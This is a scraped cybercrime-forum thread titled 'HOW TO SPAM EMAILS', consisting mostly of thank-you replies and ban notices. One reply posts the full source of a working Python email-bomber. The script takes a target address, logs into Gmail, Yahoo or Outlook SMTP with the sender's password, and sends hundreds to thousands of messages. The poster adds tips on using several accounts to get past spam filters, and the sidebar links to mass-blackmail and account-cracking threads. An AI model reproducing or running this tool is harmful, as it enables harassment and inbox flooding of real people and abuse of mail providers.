Sep 27, 2024, 12:41 PM
Thanks for the post mate.
|
⚔️ HOW TO SPAM EMAILS ⚔️ FREE EMAIL SPAMMER! ⚔️
by InboxInvasion - Sunday September 15, 2024 at 06:37 PM
|
|
Sep 27, 2024, 12:41 PM
Thanks for the post mate.
Sep 28, 2024, 10:50 AM
Great. I will try it. Thank you very much.
Sep 29, 2024, 03:50 AM
Thanks dude for the effort
Sep 30, 2024, 02:13 PM
Try this out today
![]() thanks This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Low IQ Scammer | $75 :sob:
Oct 01, 2024, 08:39 AM
good, let me see this
Oct 06, 2024, 01:39 PM
Oct 06, 2024, 11:21 PM
bumb bumb bumb bumb bumb bumb
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Low IQ Scammer | $75 :sob:
Oct 07, 2024, 04:55 AM
(Sep 15, 2024, 06:37 PM)InboxInvasion Wrote: let me see that ; - }, Edit another Option : ---------------------------------------------------------------------- import smtplib import sys class bcolors: GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' def banner(): print(bcolors.GREEN + '+[+[+[ Email-Bomber v1.0 ]+]+]+') print(bcolors.GREEN + '+[+[+[ made with codes ]+]+]+') class Email_Bomber: count = 0 def __init__(self): try: print(bcolors.RED + '\n+[+[+[ Initializing program ]+]+]+') self.target = str(input(bcolors.GREEN + 'Enter target email <: ')) self.mode = int(input(bcolors.GREEN + 'Enter BOMB mode (1,2,3,4) || 1:(1000) 2:(500) 3:(250) 4:(custom) <: ')) if int(self.mode) > int(4) or int(self.mode) < int(1): print('ERROR: Invalid Option. GoodBye.') sys.exit(1) except Exception as e: print(f'ERROR: {e}') def bomb(self): try: print(bcolors.RED + '\n+[+[+[ Setting up bomb ]+]+]+') self.amount = None if self.mode == int(1): self.amount = int(1000) elif self.mode == int(2): self.amount = int(500) elif self.mode == int(3): self.amount = int(250) else: self.amount = int(input(bcolors.GREEN + 'Choose a CUSTOM amount <: ')) print(bcolors.RED + f'\n+[+[+[ You have selected BOMB mode: {self.mode} and {self.amount} emails ]+]+]+') except Exception as e: print(f'ERROR: {e}') def email(self): try: print(bcolors.RED + '\n+[+[+[ Setting up email ]+]+]+') self.server = str(input(bcolors.GREEN + 'Enter email server | or select premade options - 1:Gmail 2:Yahoo 3:Outlook <: ')) premade = ['1', '2', '3'] default_port = True if self.server not in premade: default_port = False self.port = int(input(bcolors.GREEN + 'Enter port number <: ')) if default_port == True: self.port = int(587) if self.server == '1': self.server = 'smtp.gmail.com' elif self.server == '2': self.server = 'smtp.mail.yahoo.com' elif self.server == '3': self.server = 'smtp-mail.outlook.com' self.fromAddr = str(input(bcolors.GREEN + 'Enter from address <: ')) self.fromPwd = str(input(bcolors.GREEN + 'Enter from password <: ')) self.subject = str(input(bcolors.GREEN + 'Enter subject <: ')) self.message = str(input(bcolors.GREEN + 'Enter message <: ')) self.msg = '''From: %s\nTo: %s\nSubject %s\n%s\n ''' % (self.fromAddr, self.target, self.subject, self.message) self.s = smtplib.SMTP(self.server, self.port) self.s.ehlo() self.s.starttls() self.s.ehlo() self.s.login(self.fromAddr, self.fromPwd) except Exception as e: print(f'ERROR: {e}') def send(self): try: self.s.sendmail(self.fromAddr, self.target, self.msg) self.count += 1 print(bcolors.YELLOW + f'BOMB: {self.count}') except Exception as e: print(f'ERROR: {e}') def attack(self): print(bcolors.RED + '\n+[+[+[ Attacking... ]+]+]+') for email in range(self.amount + 1): self.send() self.s.close() print(bcolors.RED + '\n+[+[+[ Attack finished ]+]+]+') sys.exit(0) if __name__ == '__main__': banner() bomb = Email_Bomber() bomb.bomb() bomb.email() bomb.attack() ------------------------------------------------------- Credit to : https://github.com/ncorbuk/Python---Email-Bomber ( i just deleted the bomb image, idk i dont like it ) Already Tried it, and bc u are sending only with one email a multiples emails so ur email will gonna go to email B spam, so a better way to spam someone is by literraly spamming him with multiple emails.
Oct 08, 2024, 08:57 PM
thanks for sharing
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect. |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [2025] HOW TO GROW SILVERBULLET CPM FROM 200 TO 2500 (INSANE SPEED! | 23 | 1,019 |
1 hour ago Last Post: billaoz |
||
| LEARN TO CRACK PRIVATE + FORTNITE,ROBLOX,ORIGIN ETC ACCS HQ METHOD | 260 | 8,482 |
1 hour ago Last Post: billaoz |
||
| [Leaked E-Book] Nazeer's Income E-Book/Guide | 14 | 789 |
7 hours ago Last Post: hardtosee |
||
| [Phishing and Spam] How to setup a mail server for mass-blackmailing | 673 | 60,296 |
Apr 26, 2026, 02:19 AM Last Post: atlaskda |
||
| Make $450 Today (easy) | 230 | 7,120 |
Apr 25, 2026, 02:57 PM Last Post: crepip |
||